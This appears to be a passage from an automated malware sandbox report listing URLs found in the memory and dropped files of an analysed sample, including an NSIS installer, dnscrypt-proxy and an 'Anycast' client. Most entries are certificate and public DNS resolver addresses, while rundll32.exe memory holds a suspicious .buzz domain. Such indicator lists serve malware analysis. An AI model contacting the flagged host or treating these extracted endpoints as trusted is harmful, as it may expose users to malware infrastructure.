        Source: rundll32.exe, 00000003.00000003.2297079141.000001FF17E83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4448461751.000001FF17DE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4451840958.000001FF1A444000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4451840958.000001FF1A440000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4451840958.000001FF1A449000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4452227466.000002044E9B8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C318000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4452227466.000002044E9B0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C358000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4448708010.000002044C3FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4451629989.000001B79C7E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4451629989.000001B79C82A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4451629989.000001B79C826000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4451629989.000001B79C7E3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4451629989.000001B79C7E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A19E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mxilws.buzz/
        Source: rundll32.exe, 00000003.00000003.2912940980.000001FF17E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mxilws.buzz/L;
        Source: rundll32.exe, 00000004.00000002.4452227466.000002044E9B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://mxilws.buzz/X%
        Source: 111.exe, 00000006.00000003.2135123159.0000000000820000.00000004.00000020.00020000.00000000.sdmp, 111.exe, 00000006.00000000.2027629849.000000000040A000.00000008.00000001.01000000.00000005.sdmp, 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000003.2299425774.0000000000541000.00000004.00000020.00020000.00000000.sdmp, 111.exe, 0000001C.00000000.2095715760.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uninst.exe.6.dr, 111.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419721560.00000000124E2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000122B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: wintun.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://ocsp.digicert.com0H
        Source: wintun.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://ocsp.digicert.com0I
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: http://ocsp.digicert.com0K
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: http://ocsp.digicert.com0N
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000122B0000.00000004.00001000.00020000.00000000.sdmp, wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://ocsp.digicert.com0O
        Source: Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://ocsps.ssl.com0
        Source: Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://ocsps.ssl.com0?
        Source: QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drString found in binary or memory: http://ocsps.ssl.com0G
        Source: Anycast.exe, 0000002B.00000002.4454319070.00000000037A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drString found in binary or memory: http://sslcom.crl.certum.pl/ctnca.crl0s
        Source: QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drString found in binary or memory: http://sslcom.ocsp-certum.com08
        Source: QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drString found in binary or memory: http://sslcom.repository.certum.pl/ctnca.cer0:
        Source: dnscrypt-proxy.exe, 00000029.00000002.4459527913.0000000012338000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4242378463.0000000012337000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://unfiltered.dns.bebasid.com
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000122B0000.00000004.00001000.00020000.00000000.sdmp, wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://www.digicert.com/CPS0
        Source: wintun.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
        Source: Anycast.exe, Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp, Anycast.exe, 0000002B.00000002.4466350098.0000000006FEA000.00000002.00000001.01000000.00000021.sdmpString found in binary or memory: http://www.hardcodet.net/projects/wpf-notifyicon
        Source: Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp, Anycast.exe, 0000002B.00000002.4454319070.00000000037A1000.00000004.00000800.00020000.00000000.sdmp, Anycast.exe.6.drString found in binary or memory: http://www.hardcodet.net/taskbar
        Source: Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
        Source: Anycast.exe, 0000002B.00000002.4453114817.0000000001B10000.00000004.00000020.00020000.00000000.sdmp, Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012108000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419459951.00000000124E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4239651821.00000000123B0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drString found in binary or memory: https://...
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://101.101.101.101/index_en.html
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://127.0.0.1/dns-query
        Source: public-resolvers.md.6.drString found in binary or memory: https://ahadns.com/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012218000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://alidns.com/
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.drString found in binary or memory: https://anycast.kb.help
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.drString found in binary or memory: https://anycast.kb.help/7-%E5%90%88%E4%BC%99%E4%BA%BA%E9%A1%B9%E7%9B%AE/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://apad.pro/dns-doh/
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe, 0000002B.00000002.4454319070.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Anycast.exe.6.drString found in binary or memory: https://api.bilibili.com/x/space/notice?mid=3493118083074873&jsonp=jsonp
        Source: Anycast.exe, 0000002B.00000002.4454319070.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.fengyunyizu.com
        Source: Anycast.exe, 0000002B.00000002.4454319070.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.jianghumeng.net
        Source: Anycast.exe, 0000002B.00000002.4454319070.00000000039F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.tuanleme.nett-
        Source: dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://appliedprivacy.net).
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://blahdns.com/
        Source: public-resolvers.md.6.drString found in binary or memory: https://blog.uncensoreddns.org
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://cdome.comodo.com/shield/
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://cleanbrowsing.org/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cleanbrowsing.org/DNS-over-HTTPS
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4238314093.0000000012410000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://controld.com/free-dns
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4238742680.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460413236.00000000123F8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cryptostorm.is
        Source: public-resolvers.md.6.drString found in binary or memory: https://cryptostorm.is/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120C0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://decloudus.com
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://decloudus.comsdns://AgMAAAAAAAAADzE2Ny4yMzUuMjM2LjEwN6DMEGDTnIMptitvvH0NbfkwmGm5gefmOS1c2PpA
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dns.brahma.world)
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dns.digitalsize.net)
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dns.mullvad.net
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dns.mullvad.net/dns-query?
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dns.mullvad.net179.61.223.47:443com
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dns.mullvad.netdns.mullvad.net:443
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dns.njal.la/
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dns.njal.la/D
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461056464.0000000012462000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012308000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4237215021.0000000012461000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dns.sb
        Source: dnscrypt-proxy.exe, 00000029.00000003.3414590888.0000000012562000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dns1.ryan-palmer.com/dns-query?
        Source: dnscrypt-proxy.exe, 00000029.00000003.3414590888.0000000012562000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dns1.ryan-palmer.com/dns-query?yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABCd02OLlEQm1pJwTvQcb
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dnscrypt.be
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dnscrypt.ca/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012108000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://dnscrypt.info/doc
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012108000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://dnscrypt.info/public-servers
        Source: public-resolvers.md.6.drString found in binary or memory: https://dnscrypt.pl/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dnsforfamily.com
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461159840.000000001247B000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dnsforge.de).
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dnslow.me)
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.net
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012082000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query?body_hash=25014130e71965ff3a36b790320d6194c2b1d867fde5020d2b6f8
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000121A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.netDNSC
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dnspod.cn/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460187770.00000000123D4000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmp, sf-psvfcjj4czdu3e3p.tmp.41.dr, public-resolvers.md.6.drString found in binary or memory: https://dnswarden.com
        Source: dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://dnswarden.com/customfilter.html
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.0000000012496000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4236551052.0000000012494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dnswarden.comBlock
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012218000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://docs.usableprivacy.com
        Source: dnscrypt-proxy.exe, 00000029.00000002.4459941351.000000001239E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://doh.ffmuc.net/dns-query?
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://download.dnscrypt.info/blacklists/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://download.dnscrypt.info/resolvers-list/v2/parental-control.md
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://download.dnscrypt.info/resolvers-list/v2/public-resolvers.md
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: https://download.dnscrypt.info/resolvers-list/v2/relays.md
        Source: public-resolvers.md.6.drString found in binary or memory: https://faelix.net/
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://ffmuc.net/
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ffmuc.net/An
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ffmuc.net/Non-Logging
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ffmuc.net/sdns://AQcAAAAAAAAAGlsyMDAxOjY3ODplNjg6ZjAwMDo6XTo4NDQzIAfQevHP3F2Zdp0_AmaQpwRJZcJ
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: https://ffmuc.netpt
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://fr.dnscrypt.info
        Source: 111.exe, 00000006.00000002.2249531412.000000000040A000.00000004.00000001.01000000.00000005.sdmp, 111.exe, 0000001C.00000002.2316747034.000000000040A000.00000004.00000001.01000000.00000005.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4460506032.0000000012422000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120C0000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4459579621.000000001234A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000003.4240878390.0000000012349000.00000004.00001000.00020000.00000000.sdmp, public-resolvers.md.6.drString found in binary or memory: https://fr.dnscrypt.info/sfw.html
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fr.dnscrypt.infoAgcAAAAAAAAADTQ1LjE1My4xODcuOTagzBBg05yDKbYrb7x9DW35MJhpuYHn5jktXNj6QI9NgOYg
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fr.dnscrypt.infoDNSSEC/Non-logged/Uncensored
        Source: dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fr.dnscrypt.infosdns://AQcAAAAAAAAAFVsyMDAxOmJjODo2Mjg6YTBmOjoxXSDoAbhOpga_sLrAzkNEW7FeumSwL
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419934325.00000000124CC000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461748715.00000000124CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fr.dnscrypt.infosdns://AQcAAAAAAAAAFlsyMDAxOmJjODoxODMwOmIwNzo6MV0g6Q3ZfapcbHgiHKLF7QFoli0Ty
